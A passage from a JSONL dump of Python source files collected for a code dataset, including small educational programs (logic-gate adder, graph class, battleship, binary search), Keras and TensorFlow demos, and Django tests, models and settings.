shift\nif shift == 1:\n shift = \"Day shift\"\nelse:\n shift = \"Night shift\"\n\n# Create an instance of Production Worker\nproduction_worker = employee.ProductionWorker(name, emp_number, shift, pay_rate)\n\nprint(\"Name of production worker employee:\", name)\nprint(f\"Number of employee : #{emp_number}\")\nprint(\"Shift:\", shift)\nprint(f\"Pay rate: ${pay_rate}\")\n","sub_path":"chapter11/worker_demo.py","file_name":"worker_demo.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177156607","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 22 10:30:55 2018\n\n@author: xsxsz\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nlist=np.linspace(0,20,20,dtype='int')\ndataset=tf.data.Dataset.from_tensor_slices(list)\ndataset=dataset.map(lambda x:x+1)\ninit=tf.global_variables_initializer()\nsess=tf.Session()\nsess.run(init)\nprint(list)\nprint('------------')\niteration=dataset.make_one_shot_iterator()\nelement=iteration.get_next()\ntry:\n while True:\n print(sess.run(element))\nexcept tf.errors.OutOfRangeError:\n print('end')\nprint('------------')\ndataset1=dataset.batch(32)\niteration1=dataset1.make_one_shot_iterator()\nelement1=iteration1.get_next()\ntry:\n while True:\n print(sess.run(element1))\nexcept tf.errors.OutOfRangeError:\n print('end')\nprint('------------')\ndataset2=dataset.shuffle(buffer_size=10)\niteration2=dataset2.make_one_shot_iterator()\nelement2=iteration2.get_next()\ntry:\n while True:\n print(sess.run(element2))\nexcept tf.errors.OutOfRangeError:\n print('end')\nprint('------------')\ndataset3=dataset.repeat(2)\niteration3=dataset3.make_one_shot_iterator()\nelement3=iteration3.get_next()\ntry:\n while True:\n print(sess.run(element3))\nexcept tf.errors.OutOfRangeError:\n print('end')\n","sub_path":"tensorflow/tensorflow_33_dataset.py","file_name":"tensorflow_33_dataset.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"169034201","text":"# ASK THE USER FOR THE INPUT\ndef ask_input():\n print('Welcome to the assignment #validator')\n assignmentName = input('Enter the assignment number ==>')\n\n return assignmentName.upper()\n\n#CALCULATE THE SUM\ndef calculate_sum(str):\n sum = 0\n index = 0\n for character in str:\n sum += int(character, 16) * index\n index+= 1\n\n return sum\n\ndef get_class(c):\n class_type = 'CS000'\n if c == 'A':\n class_type = 'CS101'\n elif c == 'B':\n class_type = 'CS191'\n elif c == 'C':\n class_type = 'CS201'\n elif c == 'D':\n class_type = 'CS291'\n\n return class_type\n\ndef get_assignment(c):\n assignment_type = 'MISC'\n if c == 'A':\n assignment_type = 'Test'\n elif c == 'B':\n assignment_type = 'Program'\n elif c == 'C':\n assignment_type = 'Quiz'\n elif c == 'D':\n assignment_type = 'Final'\n elif c == 'E':\n assignment_type = 'other'\n\n return assignment_type\n\n# MAIN STARTS HERE\n#---------------------------------------------\nvalid_values = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\nuser_input = ask_input()\n\nwhile user_input != '':\n if(len(user_input) != 13):\n print ('The value entered was incorrect \\n Assignment # should be 13 characters in length \\n')\n elif user_input[0] not in ['A','B','C','D']:\n print ('The value entered was incorrect \\n The first digit must be a valid class identifier. ABCD \\n')\n elif user_input[1] not in ['A','B','C','D','E']:\n print ('The value entered was incorrect \\n The second digit must be a valid assignment type identifier. ABCDE \\n')\n else:\n substring = user_input[2:]\n valid = True\n\n for character in substring:\n if character not in valid_values:\n print('The value entered was incorrect \\n String contains invalid character %s \\n' % character)\n valid = False\n break\n\n if(valid and calculate_sum(user_input[0:-1])%10 != int(user_input[-1])):\n print('You entered the invalid value \\n')\n elif valid:\n print('Value was valid \\n')\n print(\"Assignment \",user_input, \" is for class \",get_class(user_input[0]),\" and is a \",get_assignment(user_input[1]))\n\n user_input = ask_input()\n","sub_path":"Assignment Validator.py","file_name":"Assignment Validator.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114693795","text":"class Solution:\n \"\"\"\n @param: A: an integer sorted array\n @param: target: an integer to be inserted\n @return: a list of length 2, [index1, index2]\n \"\"\"\n\n def searchRange(self, A, target):\n # write your code here\n res = [-1, -1]\n if len(A) == 0:\n return res\n\n start, end = 0, len(A) - 1\n while start + 1 < end:\n mid = (start + end) // 2\n if A[mid] < target:\n start = mid + 1\n else:\n end = mid\n\n if A[start] == target:\n res[0] = start\n elif A[end] == target:\n res[0] = end\n else:\n return res\n\n start, end = res[0], len(A) - 1\n while start + 1 < end:\n mid = (start + end) // 2\n if A[mid] <= target:\n start = mid\n else:\n end = mid - 1\n\n res[1] = end if A[end] == target else start\n\n return res\n","sub_path":"lintcode/61-search-for-a-range.py","file_name":"61-search-for-a-range.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379270425","text":"\"\"\"Ejercicio 15: Crear un programa que almacene el diccionario con los créditos de las asignaturas de un curso\r\n{'Matemáticas': 6, 'Física': 4, 'Química': 5} y después muestre por pantalla los créditos de cada asignatura en el formato\r\n tiene créditos, donde es cada una de las asignaturas del curso,\r\n y son sus créditos. Al final debe mostrar también el número total de créditos del curso.\r\n\"\"\"\r\n\r\nasignaturas = {\r\n 'Matemáticas': 6,\r\n 'Física': 4,\r\n 'Química': 5,\r\n}\r\nfor asignatura, creditos in asignaturas.items():\r\n print(f'{asignatura} tiene {creditos} créditos')\r\n\r\nvalores = asignaturas.values()\r\n\r\ntotal_creditos = 0\r\nfor valor in valores:\r\n total_creditos += valor\r\nprint(total_creditos)\r\n","sub_path":"Guia1/Ejercicio15.py","file_name":"Ejercicio15.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"278059765","text":"\"\"\"\nAll Adder Simulator\nDepartment of Digital Media 201721107 박성범\n2018.3.22\n\"\"\"\n\nclass LogicGate:\n def __init__(self, n):\n self.label = n\n self.output = None\n\n def getLabel(self):\n return self.label\n\n def getOutput(self):\n self.output = self.performGateLogic()\n return self.output\n\n\nclass BinaryGate(LogicGate):\n def __init__(self, n):\n super(BinaryGate, self).__init__(n)\n self.pinA = None\n self.pinB = None\n\n def getPinA(self):\n if self.pinA == None:\n return int(input(\"Enter Pin A input for gate \" + self.getLabel() + \"-->\"))\n else:\n return self.pinA.getFrom().getOutput()\n\n def getPinB(self):\n if self.pinB == None:\n return int(input(\"Enter Pin B input for gate \" + self.getLabel() + \"-->\"))\n else:\n return self.pinB.getFrom().getOutput()\n\n def setNextPin(self, source):\n if self.pinA == None:\n self.pinA = source\n elif self.pinB == None:\n self.pinB = source\n else:\n print(\"Cannot Connect: NO EMPTY PINS\")\n\n\nclass UnaryGate(LogicGate):\n def __init__(self, n):\n super(UnaryGate, self).__init__(n)\n self.pin = None\n\n def getPin(self):\n if self.pin == None:\n return int(input(\"Enter Pin input for gate \" + self.getLabel() + \"-->\"))\n else:\n return self.pin.getFrom().getOutput()\n\n def setNextPin(self, source):\n if self.pin == None:\n self.pin = source\n else:\n print(\"Cannot Connect: NO EMPTY PINS\")\n\n\nclass PinGate(UnaryGate):\n def __init__(self, n):\n super(PinGate, self).__init__(n)\n\n def getPin(self):\n if self.pin == None:\n self.setPin(int(input(\"Enter Pin input for gate \" + self.getLabel() + \"-->\")))\n return self.pin\n\n def setPin(self, val):\n self.pin = val\n\n def performGateLogic(self):\n return self.getPin()\n\n\nclass NotGate(UnaryGate):\n def __init__(self, n):\n super(NotGate, self).__init__(n)\n\n def performGateLogic(self):\n return not self.getPin()\n\n\nclass OrGate(BinaryGate):\n def __init__(self, n):\n super(OrGate, self).__init__(n)\n\n def performGateLogic(self):\n a = self.getPinA()\n b = self.getPinB()\n\n if a == 1 or b == 1:\n return 1\n else:\n return 0\n\n\nclass AndGate(BinaryGate):\n def __init__(self, n):\n super(AndGate, self).__init__(n)\n\n def performGateLogic(self):\n a = self.getPinA()\n b = self.getPinB()\n\n if a == 1 and b == 1:\n return 1\n else:\n return 0\n\n\nclass XorGate(BinaryGate):\n def __init__(self, n):\n super(XorGate, self).__init__(n)\n\n def performGateLogic(self):\n a = self.getPinA()\n b = self.getPinB()\n\n x = a and (not b)\n y = (not a) and b\n\n if x == 1 or y == 1:\n return 1\n else:\n return 0\n\n\nclass Connector:\n def __init__(self, fgate, tgate):\n self.fromgate = fgate\n self.togate = tgate\n tgate.setNextPin(self)\n\n def getFrom(self):\n return self.fromgate\n\n def getTo(self):\n return self.togate\n\n\ndef main():\n # Create AND Gates\n andGate = []\n andGateCount = 2\n for i in range(andGateCount):\n label = \"AND\" + str(i)\n andGate.append(AndGate(label))\n\n # Create OR Gates\n label = \"OR\"\n orGate = OrGate(label)\n\n # Create XOR Gates\n xorGate = []\n xorGateCount = 2\n for i in range(xorGateCount):\n label = \"XOR\" + str(i)\n xorGate.append(XorGate(label))\n\n # Create Pin Gates\n x = PinGate(\"x\")\n y = PinGate(\"y\")\n z = PinGate(\"z\")\n\n # Connect the gates\n Connector(x, xorGate[0])\n Connector(x, andGate[1])\n Connector(y, xorGate[0])\n Connector(y, andGate[1])\n Connector(z, xorGate[1])\n Connector(z, andGate[0])\n Connector(xorGate[0], andGate[0])\n Connector(xorGate[0], xorGate[1])\n Connector(andGate[1], orGate)\n Connector(andGate[0], orGate)\n\n print(\"Output(C, S): \", orGate.getOutput(), xorGate[1].getOutput())\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CSE200_Data-Structures/Full-Adder/FullAdder.py","file_name":"FullAdder.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372463604","text":"import json\n\nfrom django.test import TestCase\n\nfrom django.contrib.admin.models import ADDITION\nfrom corehq.apps.users.model_log import UserModelAction\nfrom corehq.apps.users.util import _get_changed_details\nfrom corehq.apps.users.management.commands.migrate_user_history_to_new_structure import \\\n migrate_user_history_to_log_entry\nfrom corehq.const import USER_CHANGE_VIA_WEB\nfrom corehq.apps.domain.shortcuts import create_domain\nfrom corehq.apps.users.models import UserHistory, WebUser, CommCareUser\n\n\nclass TestMigrateUserHistoryRecords(TestCase):\n domain = \"test-domain\"\n\n @classmethod\n def setUpClass(cls):\n cls.project = create_domain(cls.domain)\n cls.web_user = WebUser.create(cls.domain, 'test@commcarehq.org', '******',\n created_by=None, created_via=None)\n\n @classmethod\n def tearDownClass(cls):\n cls.web_user.delete(cls.domain, deleted_by=None)\n cls.project.delete()\n\n def test_migrate_user_history_to_log_entry(self):\n commcare_user = CommCareUser.create(self.domain, f'test@{self.domain}.commcarehq.org', '******',\n created_by=self.web_user, created_via=USER_CHANGE_VIA_WEB)\n user_change_details = _get_changed_details(commcare_user, UserModelAction.CREATE, {})\n user_history = UserHistory.objects.create(\n by_domain=self.domain,\n for_domain=self.domain,\n user_type=commcare_user.doc_type,\n user_id=commcare_user.get_id,\n changed_by=self.web_user.get_id,\n details={\n 'changes': user_change_details,\n 'changed_via': USER_CHANGE_VIA_WEB,\n },\n message=\"Password Reset\",\n action=UserModelAction.CREATE.value\n )\n self.addCleanup(commcare_user.delete, self.domain, deleted_by=None)\n self.addCleanup(user_history.delete)\n\n log_entry = migrate_user_history_to_log_entry(user_history)\n\n self.assertEqual(log_entry.user_id, self.web_user.get_django_user().pk)\n self.assertEqual(log_entry.object_id, str(commcare_user.get_django_user().pk))\n self.assertEqual(log_entry.action_flag, ADDITION)\n self.assertEqual(log_entry.action_time, user_history.changed_at)\n\n change_message = json.loads(log_entry.change_message)\n self.assertEqual(change_message['details']['changed_via'], USER_CHANGE_VIA_WEB)\n self.assertEqual(change_message['details']['changes'], user_change_details)\n self.assertEqual(change_message['message'], \"Password Reset\")\n self.assertEqual(change_message['user_history_pk'], user_history.pk)\n","sub_path":"corehq/apps/users/tests/test_migrate_user_history_records.py","file_name":"test_migrate_user_history_records.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43926949","text":"import os\n\ntry:\n from psycopg2cffi import compat\n\n compat.register()\nexcept ImportError:\n pass\n\nDEBUG = True\nTEMPLATE = DEBUG\nUSE_TZ = True\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\nSOUTH_TESTS_MIGRATE = False\nPQ_QUEUE_CACHE = False # switch off for tests\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'django-pq',\n 'OPTIONS': {'autocommit': True}\n },\n\n}\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'pq',\n)\nif os.getenv('SOUTH'):\n INSTALLED_APPS += ('south', )\n\nROOT_URLCONF = 'test_pq.urls'\nSECRET_KEY = '1234'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'filters': ['require_debug_true'],\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n },\n 'py.warnings': {\n 'handlers': ['console'],\n },\n 'pq': {\n 'handlers': ['console'],\n },\n }\n}\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n","sub_path":"test_pq/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"463750508","text":"\nimport argparse\nimport sys\n\nimport numpy as np\nfrom keras.preprocessing import image\nfrom keras.applications import resnet_v2\n\n\ndef get_model():\n return resnet_v2.ResNet50V2(\n include_top=True,\n weights='imagenet',\n input_shape=(224, 224,3)\n )\n\ndef get_image(path):\n img = image.load_img(path, target_size=(224, 224))\n img = image.img_to_array(img, 'channels_last')\n img = (img/255 - 0.5) * 2\n return np.expand_dims(img, axis=0)\n\n\ndef parse_arguments():\n \"\"\" Parses the Arguments \"\"\"\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(dest=\"path_to_file\",\n help=\"The file which will be recognized\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) == 1:\n print('Script error: enter path to file')\n sys.exit(1)\n\n args = parse_arguments()\n\n input_image = get_image(args.path_to_file)\n model = get_model()\n predictions = model.predict(input_image)\n\n predict_classe = resnet_v2.decode_predictions(predictions, top=1)\n imagenet_id, name, confidence = predict_classe[0][0]\n\n print(\"I am {:.4}% sure it is {}\".format(confidence * 100, name))\n","sub_path":"python/ml-dl/deception/recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91217823","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n Very Straightforward.\n \"\"\"\n def fullJustify(self, words: List[str], max_width: int) -> List[str]:\n res, curr, curr_width = [], [], 0\n for word in words:\n if len(curr) + len(word) + curr_width > max_width:\n if len(curr) == 1:\n curr_str = curr[0] + (' ' * (max_width - curr_width))\n else:\n curr_str = self.generate(curr, curr_width, max_width)\n res.append(curr_str)\n curr, curr_width = [], 0\n curr.append(word)\n curr_width += len(word)\n return res + [' '.join(curr).ljust(max_width)]\n\n def generate(self, curr, curr_width, max_width):\n res = ''\n count = len(curr)\n total_space = max_width - curr_width\n average, more = divmod(total_space, count - 1)\n i = 0\n for word in curr:\n res += word + (' ' * average)\n if i < more:\n res += ' '\n i += 1\n return res.rstrip()\n","sub_path":"0068_Text_Justification.py","file_name":"0068_Text_Justification.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81588043","text":"from tkinter import *\n# 导入ttk\nfrom tkinter import ttk\n\n\nclass App:\n def __init__(self, master):\n self.master = master\n self.initWidgets()\n\n def initWidgets(self):\n # 创建一个位图\n bm = PhotoImage(file='z012serial.png')\n # 创建一个Label,同时指定text和image\n self.label = ttk.Label(\n self.master,\n text='学编程\\n神器',\n image=bm,\n font=('StSong', 20, 'bold'),\n foreground='red'\n )\n self.label.bm = bm\n # 设置Label默认的compound为None\n self.label['compound'] = None\n self.label.pack()\n # 创建Frame容器,用于装多个Radiobutton\n f = ttk.Frame(self.master)\n f.pack(fill=BOTH, expand=YES)\n compounds = ('None', \"LEFT\", \"RIGHT\", \"TOP\", \"BOTTOM\", \"CENTER\")\n # 定义一个StringVar变量,用作绑定Radiobutton的变量\n self.var = StringVar()\n self.var.set('None')\n # 使用循环创建多个 Radion button组件\n for val in compounds:\n Radiobutton(\n f,\n text=val,\n padx=20,\n variable=self.var,\n command=self.change_compound,\n value=val\n ).pack(side=LEFT, anchor=CENTER)\n\n # 都是同一个var,是如何实现读取到被选中的那个的呢?\n # 实现change_compound方法,用于动态改变Label的compound选项\n def change_compound(self):\n self.label['compound'] = self.var.get().lower()\n print(self.var.get())\n\nroot = Tk()\nroot.title(\"compound测试\")\nApp(root)\nroot.mainloop()\n","sub_path":"pyCharmProject/zfile_tkinter_learn/z012-compound-图片与文字并存.py","file_name":"z012-compound-图片与文字并存.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"169074100","text":"from keras.models import model_from_json\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom sklearn.cross_validation import train_test_split\nfrom keras.optimizers import SGD\nfrom keras.utils.np_utils import to_categorical\nimport operator\n\n#y_binary = to_categorical(y_int)\ndataset = pd.read_excel(\"Contact_Model.xlsx\")\n\nx=dataset.iloc[0:500,0:66].values\ny=dataset.iloc[0:500,66].values\nlabelEncoder_col= LabelEncoder()\nx[:,0] = labelEncoder_col.fit_transform(x[:,0])\nx[:,1] = labelEncoder_col.fit_transform(x[:,1])\nx[:,2]/=100\nx[:,3] = labelEncoder_col.fit_transform(x[:,3])\nx[:,4] = labelEncoder_col.fit_transform(x[:,4])\nx[:,5] = labelEncoder_col.fit_transform(x[:,5])\ny[:] = labelEncoder_col.fit_transform(y[:])\nfor i in range(6,66):\n x[:,i] = labelEncoder_col.fit_transform(x[:,i])\n\n'''\nprint(\"X_0_:{}\".format(x[:,0]))\nprint(\"X_1_:{}\".format(x[:,1]))\nprint(\"X_3_:{}\".format(x[:,3]))\nprint(\"X_4_:{}\".format(x[:,4]))\nprint(\"X_5_:{}\".format(x[:,7]))\nprint(\"Y_0_:{}\".format(y[:]))\n'''\n\nX_train, X_test, Y_train, Y_test = train_test_split(x,y,test_size=.1, random_state=0 )\nY_train = to_categorical(Y_train, 3)\ny = to_categorical(y, 3)\n\nmodel = Sequential()\nmodel.add(Dense(66, input_dim=66, activation='relu'))\nmodel.add(Dense(66, activation='relu'))\nmodel.add(Dense(3, activation='softmax'))\n\n\n#compile model\nmodel.compile(loss='MSE', optimizer=SGD(), metrics=['accuracy'] )\n\nmodel.summary()\n\nmodel.fit(X_train, Y_train, epochs=500 , batch_size=30)\n\n#model.fit(x, y, epochs=500 , batch_size=30)\n\n\n\nY_pred = model.predict(x)\nY_pred.shape\nprint(Y_pred)\nY_pre=[]\nfor i in Y_pred:\n max_index, max_value = max(enumerate(i), key=operator.itemgetter(1))\n Y_pre.append(max_index)\n\n\nq=np.asarray(Y_pre,dtype=np.int)\nY_test=np.asarray(Y_test,dtype=np.int)\n\nfrom sklearn.metrics import confusion_matrix\nconfusion=confusion_matrix(Y_test, q)\ntrue=0\nfalse=0\nfor i in range(0,500):\n if(Y_pre[i]==y[i]):\n true+=1\n else:\n false+=1\n\n \n''' #save model \nfname = \"weights_contact_model_sam.hdf5\"\nmodel.save_weights(fname,overwrite=True)\n'''\n #load model\n'''\nfname = \"weights_contact_model_sam.hdf5\"\nmodel.load_weights(fname)\n'''\n\n","sub_path":"contact_pred.py","file_name":"contact_pred.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547980365","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\n\n\nclass BaseProfile(models.Model):\n # Validators\n phone_validator = RegexValidator(r'^[6-9][0-9]{9}', message='Not a Valid Phone Number')\n # Choices\n GENDER_CHOICES = (\n ('M', 'Male'),\n ('F', 'Female')\n )\n BRANCH_CHOICES = (\n ('CSE', 'Computer Science and Engineering'),\n ('EE', 'Electrical Engineering'),\n ('ME', 'Mechanical Engineering'),\n ('BB', 'BioScience and BioTechnology')\n )\n YEAR_CHOICES = (\n ('1', '1st Year'),\n ('2', '2nd Year'),\n ('3', '3rd Year'),\n ('4', '4th Year')\n )\n phone = models.CharField(max_length=10, validators=[phone_validator])\n github = models.URLField()\n gender = models.CharField(max_length=1, choices=GENDER_CHOICES)\n branch = models.CharField(max_length=3, choices=BRANCH_CHOICES)\n year = models.CharField(max_length=1, choices=YEAR_CHOICES)\n\n class Meta:\n abstract = True\n\n\nclass StudentProfile(BaseProfile):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n\n\nclass MentorProfile(BaseProfile):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n","sub_path":"src/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"394946131","text":"\"\"\"\n\tA Python Graph Class\n\tGraph class with basic functionalities\n\"\"\"\n\nclass Graph(object):\n\tdef __init__(self, graph_dict = {}):\n\t\t\"\"\"initialize graph object\"\"\"\n\t\tself.__graph_dict = graph_dict\n\n\tdef vertices(self):\n\t\t\"\"\"returns the vertices of a graph\"\"\"\n\t\treturn list(self.__graph_dict.keys())\n\n\tdef edges(self):\n\t\t\"\"\"returns all the edges of a graph\"\"\"\n\t\treturn self.__generate_edges()\n\n\tdef add_vertex(self, vertex):\n\t\t\"\"\"\tif vertex not in graph_dict, then add \n\t\t\tkey vertex with an empty list to graph_dict\n\t\t\"\"\"\n\t\tif vertex not in self.__graph_dict:\n\t\t\tself.__graph_dict[vertex] = []\n\n\tdef add_edge(self, edge):\n\t\t\"\"\"assumes edge is a set/ tuple/ list\"\"\"\n\t\tedge = set(edge)\n\t\t(vertex1, vertex2) = tuple(edge)\n\t\tif vertex1 in self.__graph_dict:\n\t\t\tself.__graph_dict[vertex1].append(vertex2)\n\t\telse:\n\t\t\tself.__graph_dict[vertex1] = [vertex2]\n\n\tdef __generate_edges(self):\n\t\t\"\"\" generate edges in graph, edges representes as\n\t\t\tset with one/ two vertices\n\t\t\"\"\"\n\t\tedges = []\n\t\tfor vertex in self.__graph_dict:\n\t\t\tfor neighbor in self.__graph_dict[vertex]:\n\t\t\t\tif {neighbor, vertex} not in edges:\n\t\t\t\t\tedges.append({vertex, neighbor})\n\t\treturn edges\n\n\tdef find_path(self, start_vertex, end_vertex, path = []):\n\t\t\"\"\" finds a path from start vertex to end vertex in graph \"\"\"\n\t\tgraph = self.__graph_dict\n\t\tpath = path + [start_vertex]\n\t\tif start_vertex == end_vertex:\n\t\t\treturn path\n\t\tif start_vertex not in graph:\n\t\t\treturn None\n\t\tfor vertex in graph[start_vertex]:\n\t\t\tif vertex not in path:\n\t\t\t\textended_path = self.find_path(vertex, end_vertex, path)\n\t\t\t\tif extended_path:\n\t\t\t\t\treturn extended_path\n\t\treturn None\n\n\tdef find_all_paths(self, start_vertex, end_vertex, path = []):\n\t\t\"\"\"find all paths from start vertex to end vertex in graph\"\"\"\n\t\tgraph = self.__graph_dict\n\t\tpath = path + [start_vertex]\n\t\tif start_vertex == end_vertex:\n\t\t\treturn [path]\n\t\tif start_vertex not in graph:\n\t\t\treturn []\n\t\tpaths = []\n\t\tfor vertex in graph[start_vertex]:\n\t\t\tif vertex not in path:\n\t\t\t\textended_path = self.find_all_paths(vertex, end_vertex, path)\n\t\t\t\tfor p in extended_path:\n\t\t\t\t\tpaths.append(p)\n\t\treturn paths\n\t\t\n\n\n\n\n\tdef __str__(self):\n\t\tres = \"vertices: \"\n\t\tfor k in self.__graph_dict:\n\t\t\tres += str(k) + \" \"\n\t\tres += \"\\nedges\"\n\t\tfor edge in self.__generate_edges():\n\t\t\tres += str(edge) + \" \"\n\t\treturn res\n\nif __name__ == \"__main__\":\n\tg = { \"a\" : [\"c\"],\n\t\t \"b\" : [\"c\", \"e\"],\n\t\t \"c\" : [\"a\", \"b\", \"d\", \"e\"],\n\t\t \"d\" : [\"c\"],\n\t\t \"e\" : [\"c\", \"b\"],\n\t\t \"f\" : []\t\n\t}\n\n\tgraph = Graph(g)\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Edges of graph:\")\n\tprint(graph.edges())\n\n\tprint(\"Add vertex:\")\n\tgraph.add_vertex(\"z\")\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Add edge:\")\n\tgraph.add_edge({\"a\", \"z\"})\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Edges of graph:\")\n\tprint(graph.edges())\n\n\tprint('Adding an edge {\"x\", \"y\"} with new vertices:')\n\tgraph.add_edge({\"x\", \"y\"})\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Edges of graph:\")\n\tprint(graph.edges())","sub_path":"graph_class_rep.py","file_name":"graph_class_rep.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"449591379","text":"from random import randint\r\n\r\n\r\nclass BattleShip:\r\n board = []\r\n\r\n for x in range(10):\r\n board.append([\"O\"] * 15)\r\n\r\n def print_board(board):\r\n for row in board:\r\n print(\" \".join(row))\r\n\r\n print(\"Let's play Battleship!\")\r\n print_board(board)\r\n\r\n def num_hides(board):\r\n return randint(5, len(board))\r\n\r\n def random_row(board):\r\n return randint(0, len(board) - 1)\r\n\r\n def random_col(board):\r\n return randint(0, len(board[0]) - 1)\r\n\r\n hides = num_hides(board)\r\n ships = {}\r\n\r\n for hide in range(hides):\r\n ships.update({hide : [random_row(board) , random_col(board)]})\r\n\r\n newships = {}\r\n\r\n for ship in ships:\r\n ship_coords = ships[ship]\r\n board[ship_coords[0]][ship_coords[1]] = \"X\"\r\n if ship_coords[1] < (len(board[0]) - 1):\r\n board[ship_coords[0]][ship_coords[1] + 1] = \"x\"\r\n newships.update({hides : [ship_coords[0], ship_coords[1] + 1]})\r\n hides += 1\r\n\r\n ships.update(newships)\r\n print(hides)\r\n print(ships)\r\n print_board(board)\r\n\r\n print(ships.get(0))\r\n print(len(ships))\r\n print(ships.get(0)[0])\r\n\r\n guess_row = int(input(\"Guess Row:\"))\r\n guess_col = int(input(\"Guess Col:\"))\r\n\r\n tries = 0\r\n score = 0\r\n\r\n while tries <= hides:\r\n for correctAnswers in range(0, len(ships)):\r\n if guess_row == ships.get(correctAnswers)[0] and guess_col == ships.get(correctAnswers)[1]:\r\n score += 1\r\n if score == 1:\r\n print(\"Ow! You sank one of my battleships! Well, there's more.\")\r\n elif score > 1 and score < 6:\r\n print(\"Another one again!\")\r\n elif score > 5 and score < hides:\r\n print(\"Damn it! You're on a roll!\")\r\n else:\r\n print(\"Fine. You win. >:(\")\r\n\r\n if board[ships.get(correctAnswers)[0]][ships.get(correctAnswers)[1]] == \"X\":\r\n board[ships.get(correctAnswers)[0]][ships.get(correctAnswers)[1]] = \"<\"\r\n else:\r\n board[ships.get(correctAnswers)[0]][ships.get(correctAnswers)[1]] = \"~\"\r\n else:\r\n pass\r\n\r\n print_board(board)\r\n guess_row = int(input(\"Guess Row:\"))\r\n guess_col = int(input(\"Guess Col:\"))\r\n tries += 1\r\n\r\nBattleShip()\r\n","sub_path":"BattleShip.py","file_name":"BattleShip.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"642915086","text":"from fibonacci_module import fib\r\nfrom time import time\r\n\r\nmax_fibonacci = int(input(\"Fibonacci numbers for range 0 to \"))\r\n\r\nfor n in range(0, max_fibonacci + 1):\r\n start_time = time()\r\n fib_n = fib(n)\r\n elapsed_seconds = time() - start_time\r\n print(\"n: {0:3} fib(n): {1:10} elapsed seconds: {2}\".format(\r\n n, fib_n, elapsed_seconds))\r\n","sub_path":"ffhs/semesterarbeit/1a/fibonacci_time.py","file_name":"fibonacci_time.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370337573","text":"tc= int(input())\nwhile tc>0:\n n=int(input())\n a=[int(i) for i in input().split()]\n c=0\n for i in range(len(a)):\n for j in range(i+1,len(a)):\n if a[i]&a[j]==a[i]:\n c+=1\n print(c)\n 